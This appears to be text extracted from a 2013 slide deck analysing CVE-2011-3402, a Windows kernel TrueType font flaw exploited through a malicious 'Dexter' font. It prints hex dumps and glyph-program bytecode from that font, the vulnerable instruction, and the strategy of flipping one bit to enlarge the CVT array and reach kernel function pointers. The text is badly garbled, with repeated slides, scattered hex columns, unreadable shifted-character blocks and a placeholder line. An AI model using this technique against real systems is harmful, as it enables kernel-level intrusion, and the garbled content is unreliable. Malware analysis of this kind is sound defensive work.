6e
70
70
b8
00
00
42
42
42
53
6d
76
70
6c
65
68
6d
6f
61
61
6f
72
7f
00
00
44
4c
53
2f
61
74
67
79
61
65
74
63
78
6d
73
65
c0
00
00
54
43
43
32
70
20
6d
66
64
61
78
61
70
65
74
70
b8
00
00
|............EBDT|
|K.C....T...(EBLC|
|.M2....|...xEBSC|
|. ..........OS/2|
|.......$...Vcmap|
|.a.W.......4cvt |
|............fpgm|
|............glyf|
|..iK........head|
|..(........6hhea|
|...........$hmtx|
|.......|....loca|
|.^..........maxp|
|...#....... name|
|..:........|post|
|..>i.......5prep|
|................|
|..c.:@`...`.....|
|................|
b8__ =
7fc0 =
b8__ =
00000000
00 01 =
00
01c0
00000010 4b 90 43
63__
00000020
1f 4d =
32
00000030 1e 20 05
b8__
00000040
03 bd =
0e
00000050 00 61 00
3a40 =
00000060 00 00 00
00000070
7f 06 =
e9
60__
00000080 18 d3 69
00000090
db b2 =
28
b8__
000000a0 00 16 00
000c
000000b0
00 82 =
00
000000c0 00 5e 00
60__
000000d0
01 08 =
00
000000e0 1c d0 3a
1c__ =
000000f0 9c 11 3e
00000100
00000110
00000120
etc...
Friday, March 8, 2013
PUSHW
32704
PUSHW
00 00 10 01
448
d6 00 03 bd
MUL
14 00 03 bd
0a 00 03 be
PUSHW
ca 00 03 ba
57 00 03 ba
14912
00 00 03 ba
00 00 00 01
ADD
4b 00 03 ba
94 00 03 b9
PUSHW
be 00 03 b9
12
1e 00 03 ba
00 00 03 ba
ADD
23 00 03 ba
db 00 03 bb
JMPR
69 00 03 bd
00
54
7c
f4
24
8c
d0
0c
e4
a8
e0
7c
d4
04
a0
1c
8b 9d ff 81 00 03 ba c0
01 c0 63 b8 3a 40 60 b8
00 00 00 00 00 00 00 00
Font Program
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
04
00
00
00
00
00
00
03
00
00
00
00
00
00
00
00
00
0c
00
00
00
01
00
00
00
00
b8
00
00
00
00
00
00
01
00
00
60
00
00
28
78
94
56
34
02
9b
bc
36
24
0e
0e
20
7c
35
0d
1c
00
45
45
45
4f
63
63
66
67
68
68
68
6c
6d
6e
70
70
b8
00
00
42
42
42
53
6d
76
70
6c
65
68
6d
6f
61
61
6f
72
7f
00
00
44
4c
53
2f
61
74
67
79
61
65
74
63
78
6d
73
65
c0
00
00
54
43
43
32
70
20
6d
66
64
61
78
61
70
65
74
70
b8
00
00
|............EBDT|
|K.C....T...(EBLC|
|.M2....|...xEBSC|
|. ..........OS/2|
|.......$...Vcmap|
|.a.W.......4cvt |
|............fpgm|
|............glyf|
|..iK........head|
|..(........6hhea|
|...........$hmtx|
|.......|....loca|
|.^..........maxp|
|...#....... name|
|..:........|post|
|..>i.......5prep|
|................|
|..c.:@`...`.....|
|................|
b8__ =
7fc0 =
b8__ =
00000000
00 01 =
00
01c0
00000010 4b 90 43
63__
00000020
1f 4d =
32
00000030 1e 20 05
b8__
00000040
03 bd =
0e
00000050 00 61 00
3a40 =
00000060 00 00 00
00000070
7f 06 =
e9
60__
00000080 18 d3 69
00000090
db b2 =
28
b8__
000000a0 00 16 00
000c
000000b0
00 82 =
00
000000c0 00 5e 00
60__
000000d0
01 08 =
00
000000e0 1c d0 3a
1c__ =
000000f0 9c 11 3e
00000100
00000110
00000120
etc...
Friday, March 8, 2013
PUSHW
32704
PUSHW
00 00 10 01
448
d6 00 03 bd
MUL
14 00 03 bd
0a 00 03 be
PUSHW
ca 00 03 ba
57 00 03 ba
14912
00 00 03 ba
00 00 00 01
ADD
4b 00 03 ba
94 00 03 b9
PUSHW
be 00 03 b9
12
1e 00 03 ba
00 00 03 ba
ADD
23 00 03 ba
db 00 03 bb
JMPR
69 00 03 bd
00
54
7c
f4
24
8c
d0
0c
e4
a8
e0
7c
d4
04
a0
1c
8b 9d ff 81 00 03 ba c0
01 c0 63 b8 3a 40 60 b8
00 00 00 00 00 00 00 00
Font Program
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
04
00
00
00
00
00
00
03
00
00
00
00
00
00
00
00
00
0c
00
00
00
01
00
00
00
00
b8
00
00
00
00
00
00
01
00
00
60
00
00
28
78
94
56
34
02
9b
bc
36
24
0e
0e
20
7c
35
0d
1c
00
45
45
45
4f
63
63
66
67
68
68
68
6c
6d
6e
70
70
b8
00
00
42
42
42
53
6d
76
70
6c
65
68
6d
6f
61
61
6f
72
7f
00
00
44
4c
53
2f
61
74
67
79
61
65
74
63
78
6d
73
65
c0
00
00
54
43
43
32
70
20
6d
66
64
61
78
61
70
65
74
70
b8
00
00
|............EBDT|
|K.C....T...(EBLC|
|.M2....|...xEBSC|
|. ..........OS/2|
|.......$...Vcmap|
|.a.W.......4cvt |
|............fpgm|
|............glyf|
|..iK........head|
|..(........6hhea|
|...........$hmtx|
|.......|....loca|
|.^..........maxp|
|...#....... name|
|..:........|post|
|..>i.......5prep|
|................|
|..c.:@`...`.....|
|................|
The name Table
• Kaspersky pointed this part out:
0003bc00
0003bc10
0003bc20
0003bc30
0003bc40
0003bc50
0003bc60
0003bc70
0003bc80
0003bc90
0003bca0
0003bcb0
0003bcc0
0003bcd0
0003bce0
0003bcf0
0003bd00
0003bd10
Friday, March 8, 2013
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
07
69
30
74
2e
67
65
78
6c
72
72
20
74
20
72
65
20
65
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
62
67
30
69
20
68
72
74
61
20
56
31
65
72
65
6d
53
20
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
b4
68
33
6d
41
74
76
65
72
52
65
2e
72
65
64
61
68
49
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
43
74
20
65
6c
73
65
72
44
65
72
30
20
67
20
72
6f
6e
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
6f
20
53
20
6c
20
64
52
65
67
73
30
69
69
74
6b
77
63
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
70
a9
68
49
20
72
2e
65
78
75
69
44
73
73
72
20
74
2e
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
79
20
6f
6e
72
65
44
67
74
6c
6f
65
20
74
61
6f
69
02
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
72
32
77
63
69
73
65
75
65
61
6e
78
61
65
64
66
6d
00
|...b...C.o.p.y.r|
|.i.g.h.t. ... .2|
|.0.0.3. .S.h.o.w|
|.t.i.m.e. .I.n.c|
|... .A.l.l. .r.i|
|.g.h.t.s. .r.e.s|
|.e.r.v.e.d...D.e|
|.x.t.e.r.R.e.g.u|
|.l.a.r.D.e.x.t.e|
|.r. .R.e.g.u.l.a|
|.r.V.e.r.s.i.o.n|
|. .1...0.0.D.e.x|
|.t.e.r. .i.s. .a|
|. .r.e.g.i.s.t.e|
|.r.e.d. .t.r.a.d|
|.e.m.a.r.k. .o.f|
|. .S.h.o.w.t.i.m|
|.e. .I.n.c......|
What? Why?
• Kaspersky pointed this part out:
0003bc00
0003bc10
0003bc20
0003bc30
0003bc40
0003bc50
0003bc60
0003bc70
0003bc80
0003bc90
0003bca0
0003bcb0
0003bcc0
0003bcd0
0003bce0
0003bcf0
0003bd00
0003bd10
Friday, March 8, 2013
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
07
69
30
74
2e
67
65
78
6c
72
72
20
74
20
72
65
20
65
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
62
67
30
69
20
68
72
74
61
20
56
31
65
72
65
6d
53
20
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
b4
68
33
6d
41
74
76
65
72
52
65
2e
72
65
64
61
68
49
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
43
74
20
65
6c
73
65
72
44
65
72
30
20
67
20
72
6f
6e
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
6f
20
53
20
6c
20
64
52
65
67
73
30
69
69
74
6b
77
63
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
70
a9
68
49
20
72
2e
65
78
75
69
44
73
73
72
20
74
2e
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
79
20
6f
6e
72
65
44
67
74
6c
6f
65
20
74
61
6f
69
02
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
72
32
77
63
69
73
65
75
65
61
6e
78
61
65
64
66
6d
00
Copyright 2003 Showtime Inc.
Dexter Regular
|...b...C.o.p.y.r|
|.i.g.h.t. ... .2|
|.0.0.3. .S.h.o.w|
|.t.i.m.e. .I.n.c|
|... .A.l.l. .r.i|
|.g.h.t.s. .r.e.s|
|.e.r.v.e.d...D.e|
|.x.t.e.r.R.e.g.u|
|.l.a.r.D.e.x.t.e|
|.r. .R.e.g.u.l.a|
|.r.V.e.r.s.i.o.n|
|. .1...0.0.D.e.x|
|.t.e.r. .i.s. .a|
|. .r.e.g.i.s.t.e|
|.r.e.d. .t.r.a.d|
|.e.m.a.r.k. .o.f|
|. .S.h.o.w.t.i.m|
|.e. .I.n.c......|
Except That...
0003bc00
0003bc10
0003bc20
0003bc30
0003bc40
0003bc50
0003bc60
0003bc70
0003bc80
0003bc90
0003bca0
0003bcb0
0003bcc0
0003bcd0
0003bce0
0003bcf0
0003bd00
0003bd10
Friday, March 8, 2013
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
07
69
30
74
2e
67
65
78
6c
72
72
20
74
20
72
65
20
65
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
62
67
30
69
20
68
72
74
61
20
56
31
65
72
65
6d
53
20
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
b4
68
33
6d
41
74
76
65
72
52
65
2e
72
65
64
61
68
49
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
43
74
20
65
6c
73
65
72
44
65
72
30
20
67
20
72
6f
6e
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
6f
20
53
20
6c
20
64
52
65
67
73
30
69
69
74
6b
77
63
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
70
a9
68
49
20
72
2e
65
78
75
69
44
73
73
72
20
74
2e
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
79
20
6f
6e
72
65
44
67
74
6c
6f
65
20
74
61
6f
69
02
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
72
32
77
63
69
73
65
75
65
61
6e
78
61
65
64
66
6d
00
Copyright 2003 Showtime Inc.
Dexter Regular
|...b...C.o.p.y.r|
|.i.g.h.t. ... .2|
|.0.0.3. .S.h.o.w|
|.t.i.m.e. .I.n.c|
|... .A.l.l. .r.i|
|.g.h.t.s. .r.e.s|
|.e.r.v.e.d...D.e|
|.x.t.e.r.R.e.g.u|
|.l.a.r.D.e.x.t.e|
|.r. .R.e.g.u.l.a|
|.r.V.e.r.s.i.o.n|
|. .1...0.0.D.e.x|
|.t.e.r. .i.s. .a|
|. .r.e.g.i.s.t.e|
|.r.e.d. .t.r.a.d|
|.e.m.a.r.k. .o.f|
|. .S.h.o.w.t.i.m|
|.e. .I.n.c......|
I finally looked this up...
The television show “Dexter” did
not begin broadcasting until 2006!
Why Am I Telling You All
This Stuff About Fonts?
Friday, March 8, 2013
Kernel Bug!
• This exploit works with all software which uses
WIN32K.SYS for rendering fonts.
(As it turns out, Chrome and FireFox use their own, immune to this bug, font engines.
This makes sense for portability reasons.)
• It also escapes from sandboxes, because, it’s not
running in the sandbox, it’s in kernelspace!
• The shellcode will also have full system privileges
to everything, automatically.
Friday, March 8, 2013
CVE-2011-3402
• The bug in WIN32K.SYS, is a lack of a
bounds check when merging two bitmaps
together at some (X,Y) offset.
A
Friday, March 8, 2013
X Offset
V
CVE-2011-3402
• The bug in WIN32K.SYS, is a lack of a
bounds check when merging two bitmaps
together at some (X,Y) offset.
A
Friday, March 8, 2013
X Offset
V
CVE-2011-3402
• The bug in WIN32K.SYS, is a lack of a
bounds check when merging two bitmaps
together at some (X,Y) offset.
A V
X Offset
Friday, March 8, 2013
CVE-2011-3402
• The bug in WIN32K.SYS, is a lack of a
bounds check when merging two bitmaps
together at some (X,Y) offset.
AV
Friday, March 8, 2013
CVE-2011-3402
• The bug in WIN32K.SYS, is a lack of a
縦
bounds check when merging two bitmaps
together at some (X,Y) offset.
書
AV
Friday, March 8, 2013
き
CVE-2011-3402
• The bug in WIN32K.SYS, is a lack of a
bounds check when merging two bitmaps
together at some (X,Y) offset.
AV
Friday, March 8, 2013
縦
書
き
CVE-2011-3402
• The bug in WIN32K.SYS, is a lack of a
bounds check when merging two bitmaps
together at some (X,Y) offset.
• So, you control the bitmap data...
• And, you control the offset.
• The actual X86 instruction however is an
OR operation, not a typical MOV.
• So you can only set one-bits, not zero-bits.
Friday, March 8, 2013
That Bug Allows
This To Happen
EBX comes from TTF file
953cdce5 8a03
953cdce7 0806
mov
or
al,byte ptr [ebx]
byte ptr [esi],al
ESI comes from the earlier offset calculation
Friday, March 8, 2013
That Bug Allows
This To Happen
This is the bitmap data of your choice
EBX comes from TTF file
953cdce5 8a03
953cdce7 0806
mov
or
al,byte ptr [ebx]
byte ptr [esi],al
ESI comes from the earlier offset calculation
... And this is where you want to put it in memory!
Friday, March 8, 2013
The Important Bit
Friday, March 8, 2013
Exploiting This
• If you could only add numbers to arbitrary
kernel memory locations, which values will
lead to reliable shellcode execution?
Friday, March 8, 2013
Exploiting This
• Whoever created this exploit, chose to use this
static bitmap bug, to add one, single, bit, to a well
chosen location.
• It was the length of the CVT array, stored within
the True Type VM’s internal global state structure.
• As a consequence, the TrueType engine now
believed that it held one hundred and twenty nine
elements, rather than the original length of one.
Friday, March 8, 2013
Exploiting This
• Whoever created this exploit, chose to use this
static bitmap bug, to add one, single, bit, to a well
chosen location.
• It was the length of the CVT array, stored within
the True Type VM’s internal global state structure.
• As a consequence, the TrueType engine now
believed that it held one hundred and twenty nine
elements, rather than the original length of one.
Friday, March 8, 2013
Exploiting This
• Whoever created this exploit, chose to use this
static bitmap bug, to add one, single, bit, to a well
chosen location.
• It was the length of the CVT array, stored within
the True Type VM’s internal global state structure.
• As a consequence, the TrueType engine now
believed that it held one hundred and twenty nine
elements, rather than the original length of one.
Friday, March 8, 2013
Exploiting This
• As luck would have it, the CVT just
happens to live, immediately below the
global VM state structure in memory.
Before
CVT[0] GlobalState
GlobalState
GlobalState
Friday, March 8, 2013
GlobalState
GlobalState
GlobalState
GlobalState
GlobalState
GlobalState
Exploiting This
• As luck would have it, the CVT just
happens to live, immediately below the
global VM state structure in memory.
After
CVT[0]CVT
CVTCVTCVTCVT
CVTCVTCVTCVT
CVTCVT
GlobalState
GlobalState
GlobalState
GlobalState
GlobalState
GlobalState
CVT
CVTCVTCVTCVT
CVTCVTCVT
CVTCVTCVT
GlobalState
GlobalState
GlobalState
CVTCVTCVTCVTCVT
Friday, March 8, 2013
So, What Else Is In The
VM State Structure?
• Function pointers, [explaination goes here]
Friday, March 8, 2013
57'*>@5RXQG7R'RXEOH*ULG
&RGH5DQJH
[
3RSV
&RGH5DQJH
3XVKHV
3RSV
['
6HWV
3XVKHV
$IIHFWV
6HWV
URXQGVWDWH
0'$3>@0'53>@0,$3>@0,53>@5281'>@
URXQGVWDWH
$IIHFWV
0'$3>@0'53>@0,$3>@0,53>@5281'>@
5HODWHGLQVWUXFWLRQV
5'7*>@52))>@587*>@57'*>@57+*>@
5HODWHGLQVWUXFWLRQV
5'7*>@52))>@587*>@57*>@57+*>@
6HWVWKHURXQGVWDWHYDULDEOHWRJULG,QWKLVVWDWHGLVWDQFHVDUHFRPSHQVDWHGIRUHQJLQHFKDUDFWHULVWLFVDQGURXQGHGW
QHDUHVWLQWHJHU
6HWVWKHURXQGVWDWHYDULDEOHWRGRXEOHJULG,QWKLVVWDWHGLVWDQFHVDUHFRPSHQVDWHGIRUHQJLQHFKDUDFWHULVWLFVDQGWKHQ
URXQGHGWRDQLQWHJHURUKDOILQWHJHUZKLFKHYHULVFORVHVW
:DUQLQJ
:DUQLQJ
,Q7UXH7\SHURXQGLQJLVV\PPHWULFDERXW]HURDQGLQFOXGHVFRPSHQVDWLRQIRUSULQWHUGRWVL]H6HH(QJLQHFRPSHQVD
,Q7UXH7\SHURXQGLQJLVV\PPHWULFDERXW]HURDQGLQFOXGHVFRPSHQVDWLRQIRUSULQWHUGRWVL]H6HH(QJLQHFRPSHQVDWLRQ
XVLQJFRORURQSDJH
XVLQJFRORURQSDJH
5HWXUQWR&RQWHQWV
5HWXUQWR&RQWHQWV
57+*>@5RXQG7R+DOI*ULG
&RGH5DQJH
[
3RSV
3XVKHV
6HWV
URXQGVWDWH
$IIHFWV
0'$3>@0'53>@0,$3>@0,53>@5281'>@
5HODWHGLQVWUXFWLRQV
5'7*>@52))>@587*>@57'*>@57*>@
6HWVWKHURXQGVWDWHYDULDEOHWRKDOIJULG,QWKLVVWDWHGLVWDQFHVDUHFRPSHQVDWHGIRUHQJLQHFKDUDFWHULVWLFVDQGURXQG
WKHQHDUHVWKDOILQWHJHU,IWKHVHRSHUDWLRQVFKDQJHWKHVLJQRIWKHGLVWDQFHWKHGLVWDQFHLVVHWWRRUDFFRU
WKHRULJLQDOVLJQRIWKHGLVWDQFH
:DUQLQJ
Friday, March 8, 2013
57'*>@5RXQG7R'RXEOH*ULG
&RGH5DQJH
[
3RSV
&RGH5DQJH
3XVKHV
3RSV
['
6HWV
3XVKHV
$IIHFWV
6HWV
URXQGVWDWH
0'$3>@0'53>@0,$3>@0,53>@5281'>@
URXQGVWDWH
$IIHFWV
0'$3>@0'53>@0,$3>@0,53>@5281'>@
5HODWHGLQVWUXFWLRQV
5'7*>@52))>@587*>@57'*>@57+*>@
5HODWHGLQVWUXFWLRQV
5'7*>@52))>@587*>@57*>@57+*>@
6HWVWKHURXQGVWDWHYDULDEOHWRJULG,QWKLVVWDWHGLVWDQFHVDUHFRPSHQVDWHGIRUHQJLQHFKDUDFWHULVWLFVDQGURXQGHGW
QHDUHVWLQWHJHU
6HWVWKHURXQGVWDWHYDULDEOHWRGRXEOHJULG,QWKLVVWDWHGLVWDQFHVDUHFRPSHQVDWHGIRUHQJLQHFKDUDFWHULVWLFVDQGWKHQ
URXQGHGWRDQLQWHJHURUKDOILQWHJHUZKLFKHYHULVFORVHVW
:DUQLQJ
:DUQLQJ
,Q7UXH7\SHURXQGLQJLVV\PPHWULFDERXW]HURDQGLQFOXGHVFRPSHQVDWLRQIRUSULQWHUGRWVL]H6HH(QJLQHFRPSHQVD
,Q7UXH7\SHURXQGLQJLVV\PPHWULFDERXW]HURDQGLQFOXGHVFRPSHQVDWLRQIRUSULQWHUGRWVL]H6HH(QJLQHFRPSHQVDWLRQ
XVLQJFRORURQSDJH
XVLQJFRORURQSDJH
5HWXUQWR&RQWHQWV
5HWXUQWR&RQWHQWV
57+*>@5RXQG7R+DOI*ULG
&RGH5DQJH
[
3RSV
3XVKHV
6HWV
URXQGVWDWH
$IIHFWV
0'$3>@0'53>@0,$3>@0,53>@5281'>@
5HODWHGLQVWUXFWLRQV
5'7*>@52))>@587*>@57'*>@57*>@
6HWVWKHURXQGVWDWHYDULDEOHWRKDOIJULG,QWKLVVWDWHGLVWDQFHVDUHFRPSHQVDWHGIRUHQJLQHFKDUDFWHULVWLFVDQGURXQG
WKHQHDUHVWKDOILQWHJHU,IWKHVHRSHUDWLRQVFKDQJHWKHVLJQRIWKHGLVWDQFHWKHGLVWDQFHLVVHWWRRUDFFRU
WKHRULJLQDOVLJQRIWKHGLVWDQFH
:DUQLQJ
Friday, March 8, 2013
57'*>@5RXQG7R'RXEOH*ULG
&RGH5DQJH
[
3RSV
&RGH5DQJH
3XVKHV
3RSV
['
6HWV
3XVKHV
$IIHFWV
6HWV
URXQGVWDWH
0'$3>@0'53>@0,$3>@0,53>@5281'>@
URXQGVWDWH
$IIHFWV
0'$3>@0'53>@0,$3>@0,53>@5281'>@
5HODWHGLQVWUXFWLRQV
5'7*>@52))>@587*>@57'*>@57+*>@
5HODWHGLQVWUXFWLRQV
5'7*>@52))>@587*>@57*>@57+*>@
6HWVWKHURXQGVWDWHYDULDEOHWRJULG,QWKLVVWDWHGLVWDQFHVDUHFRPSHQVDWHGIRUHQJLQHFKDUDFWHULVWLFVDQGURXQGHGW
QHDUHVWLQWHJHU
6HWVWKHURXQGVWDWHYDULDEOHWRGRXEOHJULG,QWKLVVWDWHGLVWDQFHVDUHFRPSHQVDWHGIRUHQJLQHFKDUDFWHULVWLFVDQGWKHQ
URXQGHGWRDQLQWHJHURUKDOILQWHJHUZKLFKHYHULVFORVHVW
:DUQLQJ
:DUQLQJ
,Q7UXH7\SHURXQGLQJLVV\PPHWULFDERXW]HURDQGLQFOXGHVFRPSHQVDWLRQIRUSULQWHUGRWVL]H6HH(QJLQHFRPSHQVD
,Q7UXH7\SHURXQGLQJLVV\PPHWULFDERXW]HURDQGLQFOXGHVFRPSHQVDWLRQIRUSULQWHUGRWVL]H6HH(QJLQHFRPSHQVDWLRQ
XVLQJFRORURQSDJH
XVLQJFRORURQSDJH
5HWXUQWR&RQWHQWV
5HWXUQWR&RQWHQWV
57+*>@5RXQG7R+DOI*ULG
&RGH5DQJH
[
3RSV
3XVKHV
6HWV
URXQGVWDWH
$IIHFWV
0'$3>@0'53>@0,$3>@0,53>@5281'>@
5HODWHGLQVWUXFWLRQV
5'7*>@52))>@587*>@57'*>@57*>@
6HWVWKHURXQGVWDWHYDULDEOHWRKDOIJULG,QWKLVVWDWHGLVWDQFHVDUHFRPSHQVDWHGIRUHQJLQHFKDUDFWHULVWLFVDQGURXQG
WKHQHDUHVWKDOILQWHJHU,IWKHVHRSHUDWLRQVFKDQJHWKHVLJQRIWKHGLVWDQFHWKHGLVWDQFHLVVHWWRRUDFFRU
WKHRULJLQDOVLJQRIWKHGLVWDQFH
:DUQLQJ
Friday, March 8, 2013
3XVKHV
6HWV
US
$IIHFWV
,3>@6+&>@6+3>@6+=>@
5HODWHGLQVWUXFWLRQV
653>@653>@
6HWVDQHZYDOXHIRUUHIHUHQFHSRLQW
3RSVDSRLQWQXPEHUSIURPWKHVWDFNDQGVHWVUSWRS
5HWXUQWR&RQWHQWV
66:>@6HW6LQJOH:LGWK
&RGH5DQJH
[)
3RSV
QYDOXHIRUVLQJOHZLGWKYDOXH)8QLW
3XVKHV
6HWV
VLQJOHZLGWKYDOXH
5HODWHGLQVWUXFWLRQV
66:&,>@
(VWDEOLVKHVDQHZYDOXHIRUWKHVLQJOHZLGWKYDOXHVWDWHYDULDEOH7KHVLQJOHZLGWKYDOXHLVXVHGLQVWHDGRIDFRQWUROYDOXH
WDEOHHQWU\ZKHQWKHGLIIHUHQFHEHWZHHQWKHVLQJOHZLGWKYDOXHDQGWKHJLYHQ&97HQWU\LVOHVVWKDQWKHVLQJOHZLGWKFXWLQ
3RSVDELWLQWHJHUYDOXHQIURPWKHVWDFNDQGVHWVWKHVLQJOHZLGWKYDOXHLQWKHJUDSKLFVVWDWHWRQ7KHYDOXHQLV
H[SUHVVHGLQ)8QLWV
5HWXUQWR&RQWHQWV
66:&,>@6HW6LQJOH:LGWK&XW,Q
&RGH5DQJH
[(
3RSV
QYDOXHIRUVLQJOHZLGWKFXWLQ)'RW
3XVKHV
6HWV
VLQJOHZLGWKFXWLQ
Friday, March 8, 2013
NT Crash Dump
Friday, March 8, 2013
But anyway... GLYF
...
00000060
00000070
00000080
...
0003bad0
0003bae0
0003baf0
0003bb00
0003bb10
0003bb20
0003bb30
0003bb40
0003bb50
0003bb60
0003bb70
0003bb80
0003bb90
0003bba0
0003bbb0
0003bbc0
...
Friday, March 8, 2013
00 00 00 00 00 03 ba d0
7f 06 e9 00 00 00 01 0c
18 d3 69 4b 00 03 ba e4
00 00 00 02 66 70 67 6d
00 03 b8 9b 67 6c 79 66
00 00 00 bc 68 65 61 64
|............fpgm|
|............glyf|
|..iK........head|
00
00
00
45
42
b0
42
78
03
00
42
b5
44
00
00
00
00
00
b0
43
78
b0
43
b0
b0
31
03
45
03
00
00
00
|................|
|.^..............|
|......BN..CEM..C|
|Ea..#x..C..` ..#|
|B.Pa...#x.....C |
|..a ..aE..#BE..#|
|BE..#B..C..P\..#|
|x..C..Ca..#x..C.|
|.Ca\.+#x..C..` .|
|.#B.Pa\.1#x....C|
|B....CB....CEB..|
|....C..`E.P`..C#|
|D.....C..CD17...|
|.....f.........f|
|.............f..|
|.........r......|
00
5e
a9
61
b0
01
45
b0
43
23
b0
1c
b0
00
00
01
00
00
b0
b0
50
61
b0
01
61
42
02
b0
01
00
00
04
00
00
00
17
61
20
03
43
5c
b0
b0
00
1f
08
03
09
00
00
b0
23
b8
b0
23
b0
b0
50
03
43
b0
00
00
00
00
01
00
78
ff
01
42
02
2b
61
43
b0
00
66
01
02
00
00
42
b0
df
61
b0
43
23
5c
42
03
43
00
04
00
00
00
4e
00
23
45
01
61
78
b0
b0
60
b0
03
09
0e
00
00
00
b0
b0
01
b0
0d
00
23
b0
b0
43
01
01
72
00
00
43
01
80
23
00
23
43
78
00
50
44
04
00
00
00
01
45
60
1c
42
50
78
b0
b0
43
60
31
09
0c
03
00
00
4d
20
b0
45
5c
b0
01
01
45
b0
37
00
00
00
00
01
b0
b0
00
b0
b0
01
60
b0
42
00
01
00
66
01
This is what was
00
00
00
00
43
02
18
43
20
02
b8
43
01
00
00
04
00
01
43
23
20
23
23
b0
b0
43
ff
23
00
66
03
09
win32k!itrp_ExecuteGlyphPgm
was executing
GLYF Program
...
00000060
00000070
00000080
...
0003bad0
0003bae0
0003baf0
0003bb00
0003bb10
0003bb20
0003bb30
0003bb40
0003bb50
0003bb60
0003bb70
0003bb80
0003bb90
0003bba0
0003bbb0
0003bbc0
...
Friday, March 8, 2013
00 00 00 00 00 03 ba d0
7f 06 e9 00 00 00 01 0c
18 d3 69 4b 00 03 ba e4
00 00 00 02 66 70 67 6d
00 03 b8 9b 67 6c 79 66
00 00 00 bc 68 65 61 64
|............fpgm|
|............glyf|
|..iK........head|
00
00
00
45
42
b0
42
78
03
00
42
b5
44
00
00
00
00
00
b0
43
78
b0
43
b0
b0
31
03
45
03
00
00
00
|................|
|.^..............|
|......BN..CEM..C|
|Ea..#x..C..` ..#|
|B.Pa...#x.....C |
|..a ..aE..#BE..#|
|BE..#B..C..P\..#|
|x..C..Ca..#x..C.|
|.Ca\.+#x..C..` .|
|.#B.Pa\.1#x....C|
|B....CB....CEB..|
|....C..`E.P`..C#|
|D.....C..CD17...|
|.....f.........f|
|.............f..|
|.........r......|
169 bytes long
00
5e
a9
61
b0
01
45
b0
43
23
b0
1c
b0
00
00
01
00
00
b0
b0
50
61
b0
01
61
42
02
b0
01
00
00
04
00
00
00
17
61
20
03
43
5c
b0
b0
00
1f
08
03
09
00
00
b0
23
b8
b0
23
b0
b0
50
03
43
b0
00
00
00
00
01
00
78
ff
01
42
02
2b
61
43
b0
00
66
01
02
00
00
42
b0
df
61
b0
43
23
5c
42
03
43
00
04
00
00
00
4e
00
23
45
01
61
78
b0
b0
60
b0
03
09
0e
00
00
00
b0
b0
01
b0
0d
00
23
b0
b0
43
01
01
72
00
00
43
01
80
23
00
23
43
78
00
50
44
04
00
00
00
01
45
60
1c
42
50
78
b0
b0
43
60
31
09
0c
03
00
00
4d
20
b0
45
5c
b0
01
01
45
b0
37
00
00
00
00
01
b0
b0
00
b0
b0
01
60
b0
42
00
01
00
66
01
00
00
00
00
43
02
18
43
20
02
b8
43
01
00
00
04
00
01
43
23
20
23
23
b0
b0
43
ff
23
00
66
03
09
GLYF Program
...
00000060
00000070
00000080
...
0003bad0
0003bae0
0003baf0
0003bb00
0003bb10
0003bb20
0003bb30
0003bb40
0003bb50
0003bb60
0003bb70
0003bb80
0003bb90
0003bba0
0003bbb0
0003bbc0
...
Friday, March 8, 2013
00 00 00 00 00 03 ba d0
7f 06 e9 00 00 00 01 0c
18 d3 69 4b 00 03 ba e4
00 00 00 02 66 70 67 6d
00 03 b8 9b 67 6c 79 66
00 00 00 bc 68 65 61 64
|............fpgm|
|............glyf|
|..iK........head|
00
00
00
45
42
b0
42
78
03
00
42
b5
44
00
00
00
00
00
b0
43
78
b0
43
b0
b0
31
03
45
03
00
00
00
|................|
|.^..............|
|......BN..CEM..C|
|Ea..#x..C..` ..#|
|B.Pa...#x.....C |
|..a ..aE..#BE..#|
|BE..#B..C..P\..#|
|x..C..Ca..#x..C.|
|.Ca\.+#x..C..` .|
|.#B.Pa\.1#x....C|
|B....CB....CEB..|
|....C..`E.P`..C#|
|D.....C..CD17...|
|.....f.........f|
|.............f..|
|.........r......|
00
5e
a9
61
b0
01
45
b0
43
23
b0
1c
b0
00
00
01
00
00
b0
b0
50
61
b0
01
61
42
02
b0
01
00
00
04
00
00
00
17
61
20
03
43
5c
b0
b0
00
1f
08
03
09
00
00
b0
23
b8
b0
23
b0
b0
50
03
43
b0
00
00
00
00
01
00
78
ff
01
42
02
2b
61
43
b0
00
66
01
02
00000:
00002:
00004:
00005:
00006:
00008:
00009:
0000A:
0000B:
00
00
42
b0
df
61
b0
43
23
5c
42
03
43
00
04
00
00
00
4e
00
23
45
01
61
78
b0
b0
60
b0
03
09
0e
00
00
00
b0
b0
01
b0
0d
00
23
b0
b0
43
01
01
72
PUSHB 0
PUSHB 0
WS
FLIPOFF
PUSHB 0
RS
RCVT
FLIPON
PUSHB 0
00
00
43
01
80
23
00
23
43
78
00
50
44
04
00
00
00
01
45
60
1c
42
50
78
b0
b0
43
60
31
09
0c
03
00
00
4d
20
b0
45
5c
b0
01
01
45
b0
37
00
